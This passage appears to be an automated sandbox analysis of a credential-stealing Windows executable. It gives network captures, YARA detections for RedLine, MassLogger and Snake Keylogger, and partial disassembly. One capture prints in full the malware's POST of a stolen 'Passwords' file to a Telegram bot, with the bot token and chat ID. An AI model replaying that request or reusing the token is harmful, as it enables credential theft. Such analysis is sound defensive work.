                                                                          Jan 11, 2025 09:15:25.462714911 CET44349712104.21.16.1192.168.2.12
                                                                          Jan 11, 2025 09:15:25.462888002 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:25.468941927 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:25.468970060 CET44349712104.21.16.1192.168.2.12
                                                                          Jan 11, 2025 09:15:25.469388008 CET44349712104.21.16.1192.168.2.12
                                                                          Jan 11, 2025 09:15:25.511765957 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:25.519706964 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:25.563330889 CET44349712104.21.16.1192.168.2.12
                                                                          Jan 11, 2025 09:15:25.633475065 CET44349712104.21.16.1192.168.2.12
                                                                          Jan 11, 2025 09:15:25.633665085 CET44349712104.21.16.1192.168.2.12
                                                                          Jan 11, 2025 09:15:25.633739948 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:25.640852928 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:30.742084026 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:15:30.749192953 CET8049711193.122.6.168192.168.2.12
                                                                          Jan 11, 2025 09:15:30.929501057 CET8049711193.122.6.168192.168.2.12
                                                                          Jan 11, 2025 09:15:30.941095114 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:15:30.941134930 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:30.941196918 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:15:30.941725969 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:15:30.941736937 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:30.980555058 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:15:31.582798958 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:31.582932949 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:15:31.585123062 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:15:31.585133076 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:31.585366964 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:31.586960077 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:15:31.627329111 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:31.627480030 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:15:31.627487898 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:31.912329912 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:31.912396908 CET44349713149.154.167.220192.168.2.12
                                                                          Jan 11, 2025 09:15:31.912448883 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:15:31.913837910 CET49713443192.168.2.12149.154.167.220
                                                                          Jan 11, 2025 09:16:35.929038048 CET8049711193.122.6.168192.168.2.12
                                                                          Jan 11, 2025 09:16:35.929111004 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:17:05.652887106 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:17:05.657831907 CET8049711193.122.6.168192.168.2.12

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 11, 2025 09:15:23.929912090 CET5477353192.168.2.121.1.1.1
                                                                          Jan 11, 2025 09:15:23.938246965 CET53547731.1.1.1192.168.2.12
                                                                          Jan 11, 2025 09:15:24.926006079 CET6305753192.168.2.121.1.1.1
                                                                          Jan 11, 2025 09:15:24.933347940 CET53630571.1.1.1192.168.2.12
                                                                          Jan 11, 2025 09:15:30.933702946 CET6359853192.168.2.121.1.1.1
                                                                          Jan 11, 2025 09:15:30.940347910 CET53635981.1.1.1192.168.2.12

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 11, 2025 09:15:23.929912090 CET192.168.2.121.1.1.10x1721Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:24.926006079 CET192.168.2.121.1.1.10x2187Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:30.933702946 CET192.168.2.121.1.1.10x29a0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 11, 2025 09:15:23.938246965 CET1.1.1.1192.168.2.120x1721No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:23.938246965 CET1.1.1.1192.168.2.120x1721No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:23.938246965 CET1.1.1.1192.168.2.120x1721No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:23.938246965 CET1.1.1.1192.168.2.120x1721No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:23.938246965 CET1.1.1.1192.168.2.120x1721No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:23.938246965 CET1.1.1.1192.168.2.120x1721No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:24.933347940 CET1.1.1.1192.168.2.120x2187No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:24.933347940 CET1.1.1.1192.168.2.120x2187No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:24.933347940 CET1.1.1.1192.168.2.120x2187No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:24.933347940 CET1.1.1.1192.168.2.120x2187No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:24.933347940 CET1.1.1.1192.168.2.120x2187No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:24.933347940 CET1.1.1.1192.168.2.120x2187No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:24.933347940 CET1.1.1.1192.168.2.120x2187No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                          Jan 11, 2025 09:15:30.940347910 CET1.1.1.1192.168.2.120x29a0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • reallyfreegeoip.org
                                                                          • api.telegram.org
                                                                          • checkip.dyndns.org

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.1249711193.122.6.168806892C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 11, 2025 09:15:23.958123922 CET151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Jan 11, 2025 09:15:24.665743113 CET273INHTTP/1.1 200 OK
                                                                          Date: Sat, 11 Jan 2025 08:15:24 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 104
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                          Jan 11, 2025 09:15:24.669775963 CET127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Jan 11, 2025 09:15:24.857296944 CET273INHTTP/1.1 200 OK
                                                                          Date: Sat, 11 Jan 2025 08:15:24 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 104
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                          Jan 11, 2025 09:15:30.742084026 CET127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Jan 11, 2025 09:15:30.929501057 CET273INHTTP/1.1 200 OK
                                                                          Date: Sat, 11 Jan 2025 08:15:30 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 104
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.1249712104.21.16.14436892C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-11 08:15:25 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2025-01-11 08:15:25 UTC857INHTTP/1.1 200 OK
                                                                          Date: Sat, 11 Jan 2025 08:15:25 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 362
                                                                          Connection: close
                                                                          Age: 1898114
                                                                          Cache-Control: max-age=31536000
                                                                          cf-cache-status: HIT
                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQ1Df4UsPnLhfq%2BK14%2FuVOFITzSOTU3mcIR1hWzCWvbT393QaqYhlPAhe0BpAkkuuW5trNsfJ%2B3lZXau1E1Vny8KDZId9VytaN0OcS0jGgkX88XRuTfuD%2BWCwaJfSETRU4ZrFWJi"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 90037578dc6e1899-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1570&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1796923&cwnd=153&unsent_bytes=0&cid=5d3851e7e3e2ff8d&ts=193&x=0"
                                                                          2025-01-11 08:15:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.1249713149.154.167.2204436892C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-11 08:15:31 UTC295OUTPOST /bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695799026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary================8dd31ee33dc5b19
                                                                          Host: api.telegram.org
                                                                          Content-Length: 1090
                                                                          Connection: Keep-Alive
                                                                          2025-01-11 08:15:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 65 33 33 64 63 35 62 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: --===============8dd31ee33dc5b19Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                          2025-01-11 08:15:31 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Sat, 11 Jan 2025 08:15:31 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 566
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2025-01-11 08:15:31 UTC566INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 31 37 34 39 37 34 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 58 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 39 35 37 39 39 30 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 6c 65 78 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 56 69 63 74 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 41 6c 65 78 78 61 6e 64 65 72 72 5f 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 38
                                                                          Data Ascii: {"ok":true,"result":{"message_id":1929,"from":{"id":7817497413,"is_bot":true,"first_name":"NOVALOGGER","username":"NOVALOGGERXbot"},"chat":{"id":1695799026,"first_name":"Alex","last_name":"Victor","username":"Alexxanderr_1","type":"private"},"date":173658


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:03:15:20
                                                                          Start date:11/01/2025
                                                                          Path:C:\Users\user\Desktop\mnXS9meqtB.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\mnXS9meqtB.exe"
                                                                          Imagebase:0x300000
                                                                          File size:1'132'544 bytes
                                                                          MD5 hash:AA367F8D203CD02F8A82A1A351BAF271
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2347142574.0000000003150000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:03:15:21
                                                                          Start date:11/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\mnXS9meqtB.exe"
                                                                          Imagebase:0x990000
                                                                          File size:45'984 bytes
                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4776143140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:3.8%
                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                            Signature Coverage:5.2%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:65
                                                                            execution_graph 93148 303742 93149 30374b 93148->93149 93150 3037c8 93149->93150 93151 303769 93149->93151 93188 3037c6 93149->93188 93152 371e00 93150->93152 93153 3037ce 93150->93153 93154 303776 93151->93154 93155 30382c PostQuitMessage 93151->93155 93197 302ff6 16 API calls 93152->93197 93157 3037d3 93153->93157 93158 3037f6 SetTimer RegisterWindowMessageW 93153->93158 93160 303781 93154->93160 93161 371e88 93154->93161 93189 3037b9 93155->93189 93156 3037ab DefWindowProcW 93156->93189 93162 371da3 93157->93162 93163 3037da KillTimer 93157->93163 93165 30381f CreatePopupMenu 93158->93165 93158->93189 93166 303836 93160->93166 93167 303789 93160->93167 93212 344ddd 60 API calls _memset 93161->93212 93175 371ddc MoveWindow 93162->93175 93176 371da8 93162->93176 93193 303847 Shell_NotifyIconW _memset 93163->93193 93164 371e27 93198 31e312 331 API calls Mailbox 93164->93198 93165->93189 93195 31eb83 53 API calls _memset 93166->93195 93171 303794 93167->93171 93172 371e6d 93167->93172 93178 371e58 93171->93178 93186 30379f 93171->93186 93172->93156 93211 33a5f3 48 API calls 93172->93211 93173 371e9a 93173->93156 93173->93189 93175->93189 93180 371dac 93176->93180 93181 371dcb SetFocus 93176->93181 93177 3037ed 93194 30390f DeleteObject DestroyWindow Mailbox 93177->93194 93210 3455bd 70 API calls _memset 93178->93210 93179 303845 93179->93189 93182 371db5 93180->93182 93180->93186 93181->93189 93196 302ff6 16 API calls 93182->93196 93186->93156 93199 303847 Shell_NotifyIconW _memset 93186->93199 93188->93156 93191 371e4c 93200 304ffc 93191->93200 93193->93177 93194->93189 93195->93179 93196->93189 93197->93164 93198->93186 93199->93191 93201 305027 _memset 93200->93201 93213 304c30 93201->93213 93204 3050ac 93206 3050ca Shell_NotifyIconW 93204->93206 93207 373d28 Shell_NotifyIconW 93204->93207 93217 3051af 93206->93217 93209 3050df 93209->93188 93210->93179 93211->93188 93212->93173 93214 373c33 93213->93214 93215 304c44 93213->93215 93214->93215 93216 373c3c DestroyIcon 93214->93216 93215->93204 93239 345819 61 API calls _W_store_winword 93215->93239 93216->93215 93218 3051cb 93217->93218 93238 3052a2 Mailbox 93217->93238 93240 306b0f 93218->93240 93221 373ca1 LoadStringW 93225 373cbb 93221->93225 93222 3051e6 93245 306a63 93222->93245 93224 3051fb 93224->93225 93226 30520c 93224->93226 93227 30510d 48 API calls 93225->93227 93228 305216 93226->93228 93229 3052a7 93226->93229 93232 373cc5 93227->93232 93256 30510d 93228->93256 93265 306eed 93229->93265 93235 305220 _memset _wcscpy 93232->93235 93269 30518c 93232->93269 93234 373ce7 93237 30518c 48 API calls 93234->93237 93236 305288 Shell_NotifyIconW 93235->93236 93236->93238 93237->93235 93238->93209 93239->93204 93279 31f4ea 93240->93279 93242 306b34 93288 306b4a 93242->93288 93246 306adf 93245->93246 93248 306a6f __NMSG_WRITE 93245->93248 93323 30b18b 93246->93323 93250 306ad7 93248->93250 93251 306a8b 93248->93251 93249 306ab6 _memcpy_s 93249->93224 93322 30c369 48 API calls 93250->93322 93253 306b4a 48 API calls 93251->93253 93254 306a95 93253->93254 93313 31ee75 93254->93313 93257 371be7 93256->93257 93258 30511f 93256->93258 93344 33a58f 48 API calls _memcpy_s 93257->93344 93335 30b384 93258->93335 93261 30512b 93261->93235 93262 371bf1 93263 306eed 48 API calls 93262->93263 93264 371bf9 Mailbox 93263->93264 93266 306f00 93265->93266 93267 306ef8 93265->93267 93266->93235 93350 30dd47 48 API calls _memcpy_s 93267->93350 93270 305197 93269->93270 93271 371ace 93270->93271 93272 30519f 93270->93272 93273 306b4a 48 API calls 93271->93273 93351 305130 93272->93351 93276 371adb __NMSG_WRITE 93273->93276 93275 3051aa 93275->93234 93277 31ee75 48 API calls 93276->93277 93278 371b07 _memcpy_s 93277->93278 93281 31f4f2 __calloc_impl 93279->93281 93282 31f50c 93281->93282 93283 31f50e std::exception::exception 93281->93283 93291 32395c 93281->93291 93282->93242 93305 326805 RaiseException 93283->93305 93285 31f538 93306 32673b 47 API calls _free 93285->93306 93287 31f54a 93287->93242 93289 31f4ea 48 API calls 93288->93289 93290 3051d9 93289->93290 93290->93221 93290->93222 93292 3239d7 __calloc_impl 93291->93292 93294 323968 __calloc_impl 93291->93294 93312 327c0e 47 API calls __getptd_noexit 93292->93312 93296 32399b RtlAllocateHeap 93294->93296 93299 323973 93294->93299 93300 3239c3 93294->93300 93303 3239c1 93294->93303 93296->93294 93297 3239cf 93296->93297 93297->93281 93299->93294 93307 3281c2 47 API calls __NMSG_WRITE 93299->93307 93308 32821f 